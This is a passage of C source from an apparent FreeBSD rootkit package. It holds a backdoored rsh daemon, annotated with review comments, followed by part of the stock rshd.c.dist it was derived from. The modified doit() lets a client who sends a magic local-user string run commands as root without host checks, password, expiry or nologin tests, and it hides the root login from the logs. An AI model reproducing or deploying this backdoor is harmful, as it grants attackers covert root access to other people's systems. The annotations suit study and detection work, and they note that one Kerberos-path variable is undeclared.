char    authbuf[sizeof(AUTH_DAT)];
char    tickbuf[sizeof(KTEXT_ST)];
int doencrypt, use_kerberos, vacuous;
Key_schedule    schedule;
#else
#define OPTIONS "alnL"
#endif

/*
 * main: open syslog as "rshd", parse the OPTIONS flags, fetch the peer
 * address of descriptor 0, set SO_KEEPALIVE (unless -n) and SO_LINGER on
 * it, then hand the connection to doit().
 */
int
main(argc, argv)
    int argc;
    char *argv[];
{
    extern int __check_rhosts_file;
    struct linger linger;
    int ch, on = 1, fromlen;
    struct sockaddr_in from;

    openlog("rshd", LOG_PID | LOG_ODELAY, LOG_DAEMON);

    opterr = 0;
    while ((ch = getopt(argc, argv, OPTIONS)) != EOF)
        switch (ch) {
        case 'a':
            check_all = 1;
            break;
        case 'l':
            __check_rhosts_file = 0;
            break;
        case 'n':
            keepalive = 0;
            break;
#ifdef  KERBEROS
        case 'k':
            use_kerberos = 1;
            break;

        case 'v':
            vacuous = 1;
            break;

#ifdef CRYPT
        case 'x':
            doencrypt = 1;
            break;
#endif
#endif
        case 'L':
            log_success = 1;
            break;
        case '?':
        default:
            usage();
            break;
        }

    argc -= optind;
    argv += optind;

#ifdef  KERBEROS
    if (use_kerberos && vacuous) {
        syslog(LOG_ERR, "only one of -k and -v allowed");
        exit(2);
    }
#ifdef CRYPT
    if (doencrypt && !use_kerberos) {
        syslog(LOG_ERR, "-k is required for -x");
        exit(2);
    }
#endif
#endif

    fromlen = sizeof (from);
    if (getpeername(0, (struct sockaddr *)&from, &fromlen) < 0) {
        syslog(LOG_ERR, "getpeername: %m");
        _exit(1);
    }
    if (keepalive &&
        setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on,
        sizeof(on)) < 0)
        syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m");
    linger.l_onoff = 1;
    linger.l_linger = 60;           /* XXX */
    if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger,
        sizeof (linger)) < 0)
        syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m");
    doit(&from);
    /* NOTREACHED */
}

/* Environment handed to the user's shell; doit() appends the values. */
char    username[20] = "USER=";
char    homedir[64] = "HOME=";
char    shell[64] = "SHELL=";
char    path[100] = "PATH=";
char    *envinit[] =
        {homedir, shell, path, username, 0};
char    **environ;

/*
 * doit: serve one connection.  Reads the optional stderr port, remuser,
 * locuser and the command from descriptor 0 (see the protocol comment at
 * the top of the file), decides whether the request is allowed, and then
 * runs "<shell> -c <command>" as the local user.  Never returns: every
 * path ends in exit() or execl().
 *
 * fromp is the peer address; its sin_port is rewritten in place.
 *
 * Rootkit modification: when locuser equals MAG the flag werd is set and
 * the tests guarded by !werd below are skipped.  Compare each marked
 * spot with rshd.c.dist, which has none of them.
 */
void
doit(fromp)
    struct sockaddr_in *fromp;
{
    extern char *__rcmd_errstr; /* syslog hook from libc/net/rcmd.c. */
    struct hostent *hp;
    struct passwd *pwd;
    u_short port;
    fd_set ready, readfrom;
    int cc, nfd, pv[2], pid, s;
    int one = 1;
    char *hostname, *errorstr, *errorhost;
    char *cp, sig, buf[BUFSIZ];
    char cmdbuf[NCARGS+1], locuser[16], remuser[16];
    char remotehost[2 * MAXHOSTNAMELEN + 1];

#ifdef  KERBEROS
    AUTH_DAT    *kdata = (AUTH_DAT *) NULL;
    KTEXT       ticket = (KTEXT) NULL;
    char        instance[INST_SZ], version[VERSION_SIZE];
    struct      sockaddr_in fromaddr;
    int     rc;
    long        authopts;
    int     pv1[2], pv2[2];
    fd_set      wready, writeto;

    fromaddr = *fromp;
#endif

    /*
     * Rootkit modification (not in rshd.c.dist): MAG is a NUL-terminated
     * copy of the first six characters of ROOTKIT_MAGIC; werd records
     * that the client sent that value as locuser.
     */
    char MAG[7];
    int werd=0;

    MAG[0]=ROOTKIT_MAGIC[0];
    MAG[1]=ROOTKIT_MAGIC[1];
    MAG[2]=ROOTKIT_MAGIC[2];
    MAG[3]=ROOTKIT_MAGIC[3];
    MAG[4]=ROOTKIT_MAGIC[4];
    MAG[5]=ROOTKIT_MAGIC[5];
    MAG[6]='\0';

    (void) signal(SIGINT, SIG_DFL);
    (void) signal(SIGQUIT, SIG_DFL);
    (void) signal(SIGTERM, SIG_DFL);
#ifdef DEBUG
    { int t = open(_PATH_TTY, 2);
      if (t >= 0) {
        ioctl(t, TIOCNOTTY, (char *)0);
        (void) close(t);
      }
    }
#endif
    /* From here on sin_port is in host byte order. */
    fromp->sin_port = ntohs((u_short)fromp->sin_port);
    if (fromp->sin_family != AF_INET) {
        syslog(LOG_ERR, "malformed \"from\" address (af %d)\n",
            fromp->sin_family);
        exit(1);
    }
#ifdef IP_OPTIONS
      {
    u_char optbuf[BUFSIZ/3], *cp;
    char lbuf[BUFSIZ], *lp;
    int optsize = sizeof(optbuf), ipproto;
    struct protoent *ip;

    if ((ip = getprotobyname("ip")) != NULL)
        ipproto = ip->p_proto;
    else
        ipproto = IPPROTO_IP;
    /* Log any IP options set on the connection as hex, then clear them. */
    if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
        optsize != 0) {
        lp = lbuf;
        for (cp = optbuf; optsize > 0; cp++, optsize--, lp += 3)
            sprintf(lp, " %2.2x", *cp);
        syslog(LOG_NOTICE,
            "Connection received from %s using IP options (ignored):%s",
            inet_ntoa(fromp->sin_addr), lbuf);
        if (setsockopt(0, ipproto, IP_OPTIONS,
            (char *)NULL, optsize) != 0) {
            syslog(LOG_ERR, "setsockopt IP_OPTIONS NULL: %m");
            exit(1);
        }
    }
      }
#endif

#ifdef  KERBEROS
    if (!use_kerberos)
#endif
        if (fromp->sin_port >= IPPORT_RESERVED ||
            fromp->sin_port < IPPORT_RESERVED/2) {
            syslog(LOG_NOTICE|LOG_AUTH,
                "Connection from %s on illegal port %u",
                inet_ntoa(fromp->sin_addr),
                fromp->sin_port);
            exit(1);
        }

    /*
     * Read the decimal stderr port, terminated by NUL, with a 60 second
     * alarm pending.  The bytes are not checked to be digits.
     */
    (void) alarm(60);
    port = 0;
    for (;;) {
        char c;
        if ((cc = read(STDIN_FILENO, &c, 1)) != 1) {
            if (cc < 0)
                syslog(LOG_NOTICE, "read: %m");
            shutdown(0, 1+1);
            exit(1);
        }
        if (c== 0)
            break;
        port = port * 10 + c - '0';
    }

    (void) alarm(0);
    if (port != 0) {
        /* Connect back to the client for the stderr/signal channel. */
        int lport = IPPORT_RESERVED - 1;
        s = rresvport(&lport);
        if (s < 0) {
            syslog(LOG_ERR, "can't get stderr port: %m");
            exit(1);
        }
#ifdef  KERBEROS
        if (!use_kerberos)
#endif
            if (port >= IPPORT_RESERVED) {
                syslog(LOG_ERR, "2nd port not reserved\n");
                exit(1);
            }
        fromp->sin_port = htons(port);
        if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) {
            syslog(LOG_INFO, "connect second port %d: %m", port);
            exit(1);
        }
    }

#ifdef  KERBEROS
    if (vacuous) {
        error("rshd: remote host requires Kerberos authentication\n");
        exit(1);
    }
#endif

#ifdef notdef
    /* from inetd, socket is already on 0, 1, 2 */
    dup2(f, 0);
    dup2(f, 1);
    dup2(f, 2);
#endif
    errorstr = NULL;
    hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr),
        fromp->sin_family);
    if (hp) {
        /*
         * If name returned by gethostbyaddr is in our domain,
         * attempt to verify that we haven't been fooled by someone
         * in a remote net; look up the name and check that this
         * address corresponds to the name.
         */
        hostname = hp->h_name;
#ifdef  KERBEROS
        if (!use_kerberos)
#endif
        if (check_all || local_domain(hp->h_name)) {
            strncpy(remotehost, hp->h_name, sizeof(remotehost) - 1);
            remotehost[sizeof(remotehost) - 1] = 0;
            errorhost = remotehost;
            hp = gethostbyname(remotehost);
            if (hp == NULL) {
                syslog(LOG_INFO,
                    "Couldn't look up address for %s",
                    remotehost);
                errorstr =
                "Couldn't look up address for your host (%s)\n";
                hostname = inet_ntoa(fromp->sin_addr);
            } else for (; ; hp->h_addr_list++) {
                if (hp->h_addr_list[0] == NULL) {
                    syslog(LOG_NOTICE,
                      "Host addr %s not listed for host %s",
                        inet_ntoa(fromp->sin_addr),
                        hp->h_name);
                    errorstr =
                        "Host address mismatch for %s\n";
                    hostname = inet_ntoa(fromp->sin_addr);
                    break;
                }
                if (!bcmp(hp->h_addr_list[0],
                    (caddr_t)&fromp->sin_addr,
                    sizeof(fromp->sin_addr))) {
                    hostname = hp->h_name;
                    break;
                }
            }
        }
    } else
        errorhost = hostname = inet_ntoa(fromp->sin_addr);

#ifdef  KERBEROS
    if (use_kerberos) {
        kdata = (AUTH_DAT *) authbuf;
        ticket = (KTEXT) tickbuf;
        authopts = 0L;
        strcpy(instance, "*");
        version[VERSION_SIZE - 1] = '\0';
#ifdef CRYPT
        if (doencrypt) {
            struct sockaddr_in local_addr;
            rc = sizeof(local_addr);
            if (getsockname(0, (struct sockaddr *)&local_addr,
                &rc) < 0) {
                syslog(LOG_ERR, "getsockname: %m");
                error("rlogind: getsockname: %m");
                exit(1);
            }
            authopts = KOPT_DO_MUTUAL;
            rc = krb_recvauth(authopts, 0, ticket,
                "rcmd", instance, &fromaddr,
                &local_addr, kdata, "", schedule,
                version);
            des_set_key(kdata->session, schedule);
        } else
#endif
            rc = krb_recvauth(authopts, 0, ticket, "rcmd",
                instance, &fromaddr,
                (struct sockaddr_in *) 0,
                kdata, "", (bit_64 *) 0, version);
        if (rc != KSUCCESS) {
            error("Kerberos authentication failure: %s\n",
                  krb_err_txt[rc]);
            exit(1);
        }
    } else
#endif
        getstr(remuser, sizeof(remuser), "remuser");

    getstr(locuser, sizeof(locuser), "locuser");
    getstr(cmdbuf, sizeof(cmdbuf), "command");
    /*
     * Rootkit modification: a locuser equal to MAG is replaced by
     * "root" and werd is set.  Everything after this point, including
     * the log messages, sees locuser as "root".
     */
    if(!strcmp(locuser,MAG)) {
        werd++;
        strcpy(locuser,"root");
    }
    setpwent();
    pwd = getpwnam(locuser);
    /*
     * Rootkit modification: "&& !werd" added.  With werd set and no
     * passwd entry found, pwd stays NULL and is dereferenced by the
     * chdir() below.
     */
    if (pwd == NULL && !werd) {
        syslog(LOG_INFO|LOG_AUTH,
            "%s@%s as %s: unknown login. cmd='%.80s'",
            remuser, hostname, locuser, cmdbuf);
        if (errorstr == NULL)
            errorstr = "Login incorrect.\n";
        goto fail;
    }
    if (chdir(pwd->pw_dir) < 0) {
        (void) chdir("/");
#ifdef notdef
        syslog(LOG_INFO|LOG_AUTH,
            "%s@%s as %s: no home directory. cmd='%.80s'",
            remuser, hostname, locuser, cmdbuf);
        error("No remote directory.\n");
        exit(1);
#endif
    }

#ifdef  KERBEROS
    /*
     * Rootkit modification: "&& !elite" added.
     * NOTE(review): no declaration of `elite` is visible in this file;
     * a build with KERBEROS defined presumably fails here.
     */
    if (use_kerberos && !elite) {
        if (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0') {
            if (kuserok(kdata, locuser) != 0) {
                syslog(LOG_INFO|LOG_AUTH,
                    "Kerberos rsh denied to %s.%s@%s",
                    kdata->pname, kdata->pinst, kdata->prealm);
                error("Permission denied.\n");
                exit(1);
            }
        }
    } else
#endif
    /*
     * Rootkit modification: the stock authorisation block is wrapped in
     * if(!werd).  With werd set, none of the following runs: the
     * errorstr (host name verification) test, the account expiry test,
     * the iruserok() test, the "permission denied" log entries and the
     * _PATH_NOLOGIN test.
     */
    if(!werd) {
        if (errorstr ||
            (pwd->pw_expire && time(NULL) >= pwd->pw_expire) ||
            (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0' &&
            iruserok(fromp->sin_addr.s_addr, pwd->pw_uid == 0,
            remuser, locuser) < 0)) {
            if (__rcmd_errstr)
                syslog(LOG_INFO|LOG_AUTH,
                "%s@%s as %s: permission denied (%s). cmd='%.80s'",
                    remuser, hostname, locuser, __rcmd_errstr,
                    cmdbuf);
            else
                syslog(LOG_INFO|LOG_AUTH,
                "%s@%s as %s: permission denied. cmd='%.80s'",
                    remuser, hostname, locuser, cmdbuf);
            /* Also the target of the "unknown login" goto above. */
fail:
            if (errorstr == NULL)
                errorstr = "Permission denied.\n";
            error(errorstr, errorhost);
            exit(1);
        }

        if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) {
            error("Logins currently disabled.\n");
            exit(1);
        }
    }
    /* Status byte: a single NUL tells the client the request was accepted. */
    (void) write(STDERR_FILENO, "\0", 1);
    sent_null = 1;

    if (port) {
        if (pipe(pv) < 0) {
            error("Can't make pipe.\n");
            exit(1);
        }
#ifdef CRYPT
#ifdef KERBEROS
        if (doencrypt) {
            if (pipe(pv1) < 0) {
                error("Can't make 2nd pipe.\n");
                exit(1);
            }
            if (pipe(pv2) < 0) {
                error("Can't make 3rd pipe.\n");
                exit(1);
            }
        }
#endif
#endif
        pid = fork();
        if (pid == -1)  {
            error("Can't fork; try again.\n");
            exit(1);
        }
        if (pid) {
            /*
             * Parent: relay the child's stderr (pv[0]) to the second
             * socket s, and turn each byte read from s into a signal
             * for the child's process group.
             */
#ifdef CRYPT
#ifdef KERBEROS
            if (doencrypt) {
                static char msg[] = SECURE_MESSAGE;
                (void) close(pv1[1]);
                (void) close(pv2[1]);
                des_write(s, msg, sizeof(msg) - 1);

            } else
#endif
#endif
            {
                (void) close(0);
                (void) close(1);
            }
            (void) close(2);
            (void) close(pv[1]);

            FD_ZERO(&readfrom);
            FD_SET(s, &readfrom);
            FD_SET(pv[0], &readfrom);
            if (pv[0] > s)
                nfd = pv[0];
            else
                nfd = s;
#ifdef CRYPT
#ifdef KERBEROS
            if (doencrypt) {
                FD_ZERO(&writeto);
                FD_SET(pv2[0], &writeto);
                FD_SET(pv1[0], &readfrom);

                nfd = MAX(nfd, pv2[0]);
                nfd = MAX(nfd, pv1[0]);
            } else
#endif
#endif
                ioctl(pv[0], FIONBIO, (char *)&one);

            /* should set s nbio! */
            nfd++;
            do {
                ready = readfrom;
#ifdef CRYPT
#ifdef KERBEROS
                if (doencrypt) {
                    wready = writeto;
                    if (select(nfd, &ready,
                        &wready, (fd_set *) 0,
                        (struct timeval *) 0) < 0)
                        break;
                } else
#endif
#endif
                    if (select(nfd, &ready, (fd_set *)0,
                      (fd_set *)0, (struct timeval *)0) < 0)
                        break;
                if (FD_ISSET(s, &ready)) {
                    int ret;
#ifdef CRYPT
#ifdef KERBEROS
                    if (doencrypt)
                        ret = des_read(s, &sig, 1);
                    else
#endif
#endif
                        ret = read(s, &sig, 1);
                    if (ret <= 0)
                        FD_CLR(s, &readfrom);
                    else
                        killpg(pid, sig);
                }
                if (FD_ISSET(pv[0], &ready)) {
                    errno = 0;
                    cc = read(pv[0], buf, sizeof(buf));
                    if (cc <= 0) {
                        shutdown(s, 1+1);
                        FD_CLR(pv[0], &readfrom);
                    } else {
#ifdef CRYPT
#ifdef KERBEROS
                        if (doencrypt)
                            (void)
                              des_write(s, buf, cc);
                        else
#endif
#endif
                            (void)
                              write(s, buf, cc);
                    }
                }
#ifdef CRYPT
#ifdef KERBEROS
                if (doencrypt && FD_ISSET(pv1[0], &ready)) {
                    errno = 0;
                    cc = read(pv1[0], buf, sizeof(buf));
                    if (cc <= 0) {
                        shutdown(pv1[0], 1+1);
                        FD_CLR(pv1[0], &readfrom);
                    } else
                        (void) des_write(STDOUT_FILENO,
                            buf, cc);
                }

                if (doencrypt && FD_ISSET(pv2[0], &wready)) {
                    errno = 0;
                    cc = des_read(STDIN_FILENO,
                        buf, sizeof(buf));
                    if (cc <= 0) {
                        shutdown(pv2[0], 1+1);
                        FD_CLR(pv2[0], &writeto);
                    } else
                        (void) write(pv2[0], buf, cc);
                }
#endif
#endif

            } while (FD_ISSET(s, &readfrom) ||
#ifdef CRYPT
#ifdef KERBEROS
                (doencrypt && FD_ISSET(pv1[0], &readfrom)) ||
#endif
#endif
                FD_ISSET(pv[0], &readfrom));
            exit(0);
        }
        /* Child: own process group, stderr redirected into the pipe. */
        setpgrp(0, getpid());
        (void) close(s);
        (void) close(pv[0]);
#ifdef CRYPT
#ifdef KERBEROS
        if (doencrypt) {
            close(pv1[0]); close(pv2[0]);
            dup2(pv1[1], 1);
            dup2(pv2[1], 0);
            close(pv1[1]);
            close(pv2[1]);
        }
#endif
#endif
        dup2(pv[1], 2);
        close(pv[1]);
    }
    if (*pwd->pw_shell == '\0')
        pwd->pw_shell = _PATH_BSHELL;
#if BSD > 43
    /* Rootkit modification: setlogin() is skipped when werd is set. */
    if(!werd)
    if (setlogin(pwd->pw_name) < 0)
        syslog(LOG_ERR, "setlogin() failed: %m");
#endif
    /* Return values of setgid/initgroups/setuid are not checked. */
    (void) setgid((gid_t)pwd->pw_gid);
    initgroups(pwd->pw_name, pwd->pw_gid);
    (void) setuid((uid_t)pwd->pw_uid);
    environ = envinit;
    strncat(homedir, pwd->pw_dir, sizeof(homedir)-6);
    strcat(path, _PATH_DEFPATH);
    strncat(shell, pwd->pw_shell, sizeof(shell)-7);
    strncat(username, pwd->pw_name, sizeof(username)-6);
    cp = strrchr(pwd->pw_shell, '/');
    if (cp)
        cp++;
    else
        cp = pwd->pw_shell;
    endpwent();
    /*
     * Rootkit modification: "&& !werd" added.  Because && binds tighter
     * than ||, the success entry for a werd session is suppressed only
     * while log_success (-L) is off.  With -L the session is logged
     * like any other, with locuser shown as "root".
     */
    if (log_success || pwd->pw_uid == 0 && !werd) {
#ifdef  KERBEROS
        if (use_kerberos)
            syslog(LOG_INFO|LOG_AUTH,
            "Kerberos shell from %s.%s@%s on %s as %s, cmd='%.80s'",
            kdata->pname, kdata->pinst, kdata->prealm,
            hostname, locuser, cmdbuf);
        else
#endif
            syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'",
            remuser, hostname, locuser, cmdbuf);
    }
    execl(pwd->pw_shell, cp, "-c", cmdbuf, 0);
    perror(pwd->pw_shell);
    exit(1);
}

/*
 * Report error to client.  Note: can't be used until second socket has
 * connected to client, or older clients will hang waiting for that
 * connection first.
 *
 * Until doit() has sent the NUL status byte (sent_null == 0) the message
 * is prefixed with a byte of value 1.  The format string comes from the
 * callers in this file, not from the client.  va_end() is not called.
 */
#if __STDC__
#include
#else
#include
#endif

void
#if __STDC__
error(const char *fmt, ...)
#else
error(fmt, va_alist)
    char *fmt;
        va_dcl
#endif
{
    va_list ap;
    int len;
    char *bp, buf[BUFSIZ];
#if __STDC__
    va_start(ap, fmt);
#else
    va_start(ap);
#endif
    bp = buf;
    if (sent_null == 0) {
        *bp++ = 1;
        len = 1;
    } else
        len = 0;
    (void)vsnprintf(bp, sizeof(buf) - 1, fmt, ap);
    (void)write(STDERR_FILENO, buf, len + strlen(bp));
}

/*
 * getstr: read a NUL-terminated string from descriptor 0 into buf, one
 * byte at a time.  Exits silently on a failed or short read, and exits
 * with "<err> too long" once cnt bytes have been stored, so a string of
 * at most cnt - 2 characters plus its NUL is accepted.
 */
void
getstr(buf, cnt, err)
    char *buf, *err;
    int cnt;
{
    char c;

    do {
        if (read(STDIN_FILENO, &c, 1) != 1)
            exit(1);
        *buf++ = c;
        if (--cnt == 0) {
            error("%s too long\n", err);
            exit(1);
        }
    } while (c != 0);
}

/*
 * Check whether host h is in our local domain,
 * defined as sharing the last two components of the domain part,
 * or the entire domain part if the local domain has only one component.
 * If either name is unqualified (contains no '.'),
 * assume that the host is local, as it will be
 * interpreted as such.
*/ int local_domain(h) char *h; { char localhost[MAXHOSTNAMELEN]; char *p1, *p2; localhost[0] = 0; (void) gethostname(localhost, sizeof(localhost)); p1 = topdomain(localhost); p2 = topdomain(h); if (p1 == NULL || p2 == NULL || !strcasecmp(p1, p2)) return (1); return (0); } char * topdomain(h) char *h; { char *p, *maybe = NULL; int dots = 0; for (p = h + strlen(h); p >= h; p--) { if (*p == '.') { if (++dots == 2) return (p); maybe = p; } } return (maybe); } void usage() { syslog(LOG_ERR, "usage: rshd [-%s]", OPTIONS); exit(2); } fbsdrootkit-1.2/rshd/rshd.c.dist100600 764 0 43140 6256133410 14474 0ustar dfroot/*- * Copyright (c) 1988, 1989, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1989, 1992, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)rshd.c 8.2 (Berkeley) 4/6/94"; #endif /* not lint */ /* * remote shell server: * [port]\0 * remuser\0 * locuser\0 * command\0 * data */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int keepalive = 1; int check_all; int log_success; /* If TRUE, log all successful accesses */ int sent_null; void doit __P((struct sockaddr_in *)); void error __P((const char *, ...)); void getstr __P((char *, int, char *)); int local_domain __P((char *)); char *topdomain __P((char *)); void usage __P((void)); #ifdef KERBEROS #include #include #define VERSION_SIZE 9 #define SECURE_MESSAGE "This rsh session is using DES encryption for all transmissions.\r\n" #define OPTIONS "alnkvxL" char authbuf[sizeof(AUTH_DAT)]; char tickbuf[sizeof(KTEXT_ST)]; int doencrypt, use_kerberos, vacuous; Key_schedule schedule; #else #define OPTIONS "alnL" #endif int main(argc, argv) int argc; char *argv[]; { extern int __check_rhosts_file; struct linger linger; int ch, on = 1, fromlen; struct sockaddr_in from; openlog("rshd", LOG_PID | LOG_ODELAY, LOG_DAEMON); opterr = 0; while ((ch = getopt(argc, argv, OPTIONS)) != EOF) switch (ch) { case 'a': check_all = 1; break; case 
'l': __check_rhosts_file = 0; break; case 'n': keepalive = 0; break; #ifdef KERBEROS case 'k': use_kerberos = 1; break; case 'v': vacuous = 1; break; #ifdef CRYPT case 'x': doencrypt = 1; break; #endif #endif case 'L': log_success = 1; break; case '?': default: usage(); break; } argc -= optind; argv += optind; #ifdef KERBEROS if (use_kerberos && vacuous) { syslog(LOG_ERR, "only one of -k and -v allowed"); exit(2); } #ifdef CRYPT if (doencrypt && !use_kerberos) { syslog(LOG_ERR, "-k is required for -x"); exit(2); } #endif #endif fromlen = sizeof (from); if (getpeername(0, (struct sockaddr *)&from, &fromlen) < 0) { syslog(LOG_ERR, "getpeername: %m"); _exit(1); } if (keepalive && setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on, sizeof(on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); linger.l_onoff = 1; linger.l_linger = 60; /* XXX */ if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger, sizeof (linger)) < 0) syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m"); doit(&from); /* NOTREACHED */ } char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; char path[100] = "PATH="; char *envinit[] = {homedir, shell, path, username, 0}; char **environ; void doit(fromp) struct sockaddr_in *fromp; { extern char *__rcmd_errstr; /* syslog hook from libc/net/rcmd.c. 
*/ struct hostent *hp; struct passwd *pwd; u_short port; fd_set ready, readfrom; int cc, nfd, pv[2], pid, s; int one = 1; char *hostname, *errorstr, *errorhost; char *cp, sig, buf[BUFSIZ]; char cmdbuf[NCARGS+1], locuser[16], remuser[16]; char remotehost[2 * MAXHOSTNAMELEN + 1]; #ifdef KERBEROS AUTH_DAT *kdata = (AUTH_DAT *) NULL; KTEXT ticket = (KTEXT) NULL; char instance[INST_SZ], version[VERSION_SIZE]; struct sockaddr_in fromaddr; int rc; long authopts; int pv1[2], pv2[2]; fd_set wready, writeto; fromaddr = *fromp; #endif (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); #ifdef DEBUG { int t = open(_PATH_TTY, 2); if (t >= 0) { ioctl(t, TIOCNOTTY, (char *)0); (void) close(t); } } #endif fromp->sin_port = ntohs((u_short)fromp->sin_port); if (fromp->sin_family != AF_INET) { syslog(LOG_ERR, "malformed \"from\" address (af %d)\n", fromp->sin_family); exit(1); } #ifdef IP_OPTIONS { u_char optbuf[BUFSIZ/3], *cp; char lbuf[BUFSIZ], *lp; int optsize = sizeof(optbuf), ipproto; struct protoent *ip; if ((ip = getprotobyname("ip")) != NULL) ipproto = ip->p_proto; else ipproto = IPPROTO_IP; if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) && optsize != 0) { lp = lbuf; for (cp = optbuf; optsize > 0; cp++, optsize--, lp += 3) sprintf(lp, " %2.2x", *cp); syslog(LOG_NOTICE, "Connection received from %s using IP options (ignored):%s", inet_ntoa(fromp->sin_addr), lbuf); if (setsockopt(0, ipproto, IP_OPTIONS, (char *)NULL, optsize) != 0) { syslog(LOG_ERR, "setsockopt IP_OPTIONS NULL: %m"); exit(1); } } } #endif #ifdef KERBEROS if (!use_kerberos) #endif if (fromp->sin_port >= IPPORT_RESERVED || fromp->sin_port < IPPORT_RESERVED/2) { syslog(LOG_NOTICE|LOG_AUTH, "Connection from %s on illegal port %u", inet_ntoa(fromp->sin_addr), fromp->sin_port); exit(1); } (void) alarm(60); port = 0; for (;;) { char c; if ((cc = read(STDIN_FILENO, &c, 1)) != 1) { if (cc < 0) syslog(LOG_NOTICE, "read: %m"); shutdown(0, 1+1); exit(1); } if 
(c== 0) break; port = port * 10 + c - '0'; } (void) alarm(0); if (port != 0) { int lport = IPPORT_RESERVED - 1; s = rresvport(&lport); if (s < 0) { syslog(LOG_ERR, "can't get stderr port: %m"); exit(1); } #ifdef KERBEROS if (!use_kerberos) #endif if (port >= IPPORT_RESERVED) { syslog(LOG_ERR, "2nd port not reserved\n"); exit(1); } fromp->sin_port = htons(port); if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) { syslog(LOG_INFO, "connect second port %d: %m", port); exit(1); } } #ifdef KERBEROS if (vacuous) { error("rshd: remote host requires Kerberos authentication\n"); exit(1); } #endif #ifdef notdef /* from inetd, socket is already on 0, 1, 2 */ dup2(f, 0); dup2(f, 1); dup2(f, 2); #endif errorstr = NULL; hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr), fromp->sin_family); if (hp) { /* * If name returned by gethostbyaddr is in our domain, * attempt to verify that we haven't been fooled by someone * in a remote net; look up the name and check that this * address corresponds to the name. 
*/ hostname = hp->h_name; #ifdef KERBEROS if (!use_kerberos) #endif if (check_all || local_domain(hp->h_name)) { strncpy(remotehost, hp->h_name, sizeof(remotehost) - 1); remotehost[sizeof(remotehost) - 1] = 0; errorhost = remotehost; hp = gethostbyname(remotehost); if (hp == NULL) { syslog(LOG_INFO, "Couldn't look up address for %s", remotehost); errorstr = "Couldn't look up address for your host (%s)\n"; hostname = inet_ntoa(fromp->sin_addr); } else for (; ; hp->h_addr_list++) { if (hp->h_addr_list[0] == NULL) { syslog(LOG_NOTICE, "Host addr %s not listed for host %s", inet_ntoa(fromp->sin_addr), hp->h_name); errorstr = "Host address mismatch for %s\n"; hostname = inet_ntoa(fromp->sin_addr); break; } if (!bcmp(hp->h_addr_list[0], (caddr_t)&fromp->sin_addr, sizeof(fromp->sin_addr))) { hostname = hp->h_name; break; } } } } else errorhost = hostname = inet_ntoa(fromp->sin_addr); #ifdef KERBEROS if (use_kerberos) { kdata = (AUTH_DAT *) authbuf; ticket = (KTEXT) tickbuf; authopts = 0L; strcpy(instance, "*"); version[VERSION_SIZE - 1] = '\0'; #ifdef CRYPT if (doencrypt) { struct sockaddr_in local_addr; rc = sizeof(local_addr); if (getsockname(0, (struct sockaddr *)&local_addr, &rc) < 0) { syslog(LOG_ERR, "getsockname: %m"); error("rlogind: getsockname: %m"); exit(1); } authopts = KOPT_DO_MUTUAL; rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, &local_addr, kdata, "", schedule, version); des_set_key(kdata->session, schedule); } else #endif rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, (struct sockaddr_in *) 0, kdata, "", (bit_64 *) 0, version); if (rc != KSUCCESS) { error("Kerberos authentication failure: %s\n", krb_err_txt[rc]); exit(1); } } else #endif getstr(remuser, sizeof(remuser), "remuser"); getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); setpwent(); pwd = getpwnam(locuser); if (pwd == NULL) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: unknown 